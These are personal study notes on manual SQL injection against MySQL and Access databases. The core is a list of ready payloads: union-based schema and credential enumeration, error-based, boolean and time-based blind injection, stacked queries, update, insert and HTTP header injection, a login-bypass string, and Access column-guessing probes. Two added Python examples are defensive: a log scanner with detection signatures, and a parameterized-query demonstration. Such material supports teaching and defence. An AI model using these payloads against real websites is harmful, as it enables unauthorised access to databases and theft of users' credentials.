SQL injection attacks: notes on manual statements

========MySQL database

SQL query statements

- Get database information
    select user(),version(),database(),@@datadir,@@version_compile_os

- Get database names
    select schema_name from schemata;
    select schema_name from information_schema.schemata;
    select group_concat(distinct table_schema) from tables;
    select group_concat(distinct table_schema) from information_schema.tables;

- Get the table names of a database
    select group_concat(distinct table_name) from information_schema.tables where table_schema='mysql';
    select group_concat(distinct table_name) from information_schema.tables where table_schema=database();

- Get column names
    select group_concat(distinct column_name) from information_schema.columns where table_schema='mysql' and table_name='user';

- Get column contents
    select concat(0x3a,user,0x3a,password,0x3a) from mysql.user;

Union-based injection

Determine whether injection is possible (omitted), then determine the number of columns
    union select 
    order by
Find the echo positions (the columns whose values are displayed on the page)
    union select 1,2,3,4,……

Get database information, assuming the echo positions are 1 and 2
    union select version(),user(),3%23

Get database names
    union select null,schema_name,null from information_schema.schemata%23
    union select 1,schema_name,3 from information_schema.schemata%23
    union select null,group_concat(schema_name),null from information_schema.schemata%23

Get database tables
    union select null,group_concat(table_name),null from information_schema.tables%23//get all tables
    union select null,group_concat(table_name),null from information_schema.tables where table_schema='zaqtest'%23//get the tables of the specified database zaqtest
    union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()%23//get the tables of the current web application's database

Get the column names of the users table
    union select null,group_concat(column_name),null from information_schema.columns where table_schema=database() and table_name='users'%23

Get column contents
    union select null,concat(0x3a,username,0x3a,password,0x3a),null from zaqtest.users%23

Error-based injection

and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
and exp(~(select * from(select user())a))
(!(select * from (select user())x) - ~0)

Boolean-based blind injection

and if(mid(user(),1,1),1,0)
and if(mid(user(),1,1)='r',1,0)
and (select user() like 'r%' from tables limit 0,1)

Time-based blind injection

and if(1=1,sleep(3),1)

Stacked queries

okmmk';update Zaq_member set email=(select user()) WHERE username='okmmk';

update injection

update Zaq_member set email='',email=(select user())#' where username = 'okmmk'
update Zaq_member set email='',email=(select user()) where username = 'okmmk' 1#' where username = 'okmmk' 

insert injection

insert into test(username,password) values('1' and (updatexml(1,concat(0x7e,user(),0x7e),1))and '','234');

HTTP header injection

These HTTP headers are common locations of injection points:
    X-Forwarded-For
    Host
    User-agent
    Referer

    X-Forwarded-For:1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and 'A
    insert into Zaq_log(ip,url,referer,ua)values('1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '','http://127.0.0.1/web_sql/http-sql/index.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0')
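Added example (not part of the original notes) for the defender's side of the error-based, boolean, time-based, union and HTTP header sections above: a small log scanner that URL-decodes the request target and the Referer, User-Agent and X-Forwarded-For values from access-log lines and flags the payload shapes these notes list. The log format, the sample lines and the function names are assumptions of this example (a hypothetical Apache LogFormat that appends X-Forwarded-For as a final quoted field); the signature set is deliberately limited to the forms shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log format (hypothetical Apache LogFormat that appends the
# X-Forwarded-For header as a final quoted field): ip, time, request, status,
# size, Referer, User-Agent, X-Forwarded-For
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)

# Signature families, each taken from a payload shape listed in these notes
SIGNATURES = {
    "error-based": re.compile(
        r"\b(?:updatexml|extractvalue)\s*\(|\bfloor\s*\(\s*rand\s*\(|\bexp\s*\(\s*~", re.I),
    "union-based": re.compile(
        r"\bunion\s+select\b|\binformation_schema\.", re.I),
    "time-based": re.compile(r"\bsleep\s*\(", re.I),
    "boolean-based": re.compile(
        r"\b(?:and|or)\s+if\s*\(|\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "stacked": re.compile(r";\s*(?:update|insert|delete)\b", re.I),
}

def decode(value):
    # Decode twice so a double-encoded payload is inspected in its plain form
    return unquote_plus(unquote_plus(value))

def classify(text):
    # Names of all signature families that match the decoded text, sorted
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_line(line):
    # Inspect the request target and the three headers the notes list as
    # common injection points (Host is not recorded in this log format)
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = {}
    for field in ("target", "referer", "ua", "xff"):
        hits = classify(decode(m.group(field)))
        if hits:
            findings[field] = hits
    return {"ip": m.group("ip"), "time": m.group("time"), "findings": findings}

def scan(lines):
    # Keep only the lines that triggered at least one signature family
    return [r for r in map(scan_line, lines) if r and r["findings"]]

# Constructed sample log lines (RFC 5737 documentation addresses)
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20and%20if(1=1,sleep(3),1)%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "1\' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and \'A"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?id=2&sort=name HTTP/1.1" 200 1024 "http://127.0.0.1/web_sql/http-sql/index.php" "Mozilla/5.0" "-"',
    '203.0.113.5 - - [10/Oct/2023:13:56:12 +0000] "GET /index.php?id=-1%20union%20select%20null,group_concat(table_name),null%20from%20information_schema.tables%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["findings"])
```

The second sample line is the point of the HTTP header section: its request line is clean and the payload only appears in the X-Forwarded-For value, so a scanner that looks at the URL alone misses it. Signature matching like this is a triage aid, not a control; the fix is parameterized queries in the code that writes the log table.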

Universal password (login bypass)

or 1=1
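Added example (not from the original notes) showing why the universal-password idea above works against string-concatenated SQL and how a parameterized query stops it. It uses an in-memory SQLite database with a constructed users table; the table, the sample credentials and the helper names are assumptions of this example, not anything from the page.

```python
import sqlite3

def build_db():
    # Constructed sample data: one user in an in-memory database
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(username text, password text)")
    conn.execute("insert into users values('admin','s3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Vulnerable: user input is concatenated into the SQL text, so a quote
    # in the input changes the structure of the WHERE clause
    sql = ("select count(*) from users where username='%s' and password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone()[0] > 0

def login_safe(conn, username, password):
    # Hardened: placeholders send the values separately from the SQL text,
    # so the input is compared as a literal string and never parsed as SQL
    sql = "select count(*) from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

# The page's "or 1=1" idea, written so it fits inside the quoted WHERE clause
BYPASS = "' or '1'='1"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, wrong password:", login_vulnerable(db, "admin", "nope"))
    print("vulnerable, bypass string: ", login_vulnerable(db, "admin", BYPASS))
    print("safe, bypass string:       ", login_safe(db, "admin", BYPASS))
```

With the bypass string the vulnerable query becomes `... and password='' or '1'='1'`, which is true for every row; the parameterized version compares the password column against the literal text and finds no match. The same placeholder discipline is what removes the stacked-query, update and insert injections listed earlier, since the injected text can no longer terminate or extend the statement.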

========ACCESS database

1. Error messages:

and exists(select * from MSysAccessObjects)

and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0

2. Guess tables:

and exists(select * from tables) #a normal response means the table exists!

3. Guess columns and column contents

(1) Guess the number of columns

order by 5
union select 1,2,3,4...

Then guess the number of columns: order by 3
Assuming the column count turns out to be 3, find the echo positions: union select 1,2,3

(2) Guess column names

First guess the column names: 
    and exists(select username from admin) #a normal response means username exists
    and exists(select password from admin) #a normal response means password exists
Binary search for the column length and content:
    Guess the length:
        and (select top 1 len(username) from admin)>30    //error
        and (select top 1 len(username) from admin)<30    //True, continue with binary search
    Guess the content:
        and (select top 1 ascii(mid(username,1,1))>97 from admin)    //true
        and (select top 1 ascii(mid(username,1,1))>114 from admin)    //error
        This shows that the ASCII code of the first letter of the username field in the first record of the admin table is greater than 97 and at most 114

  • Personal notes, for reference only! (^ * ^)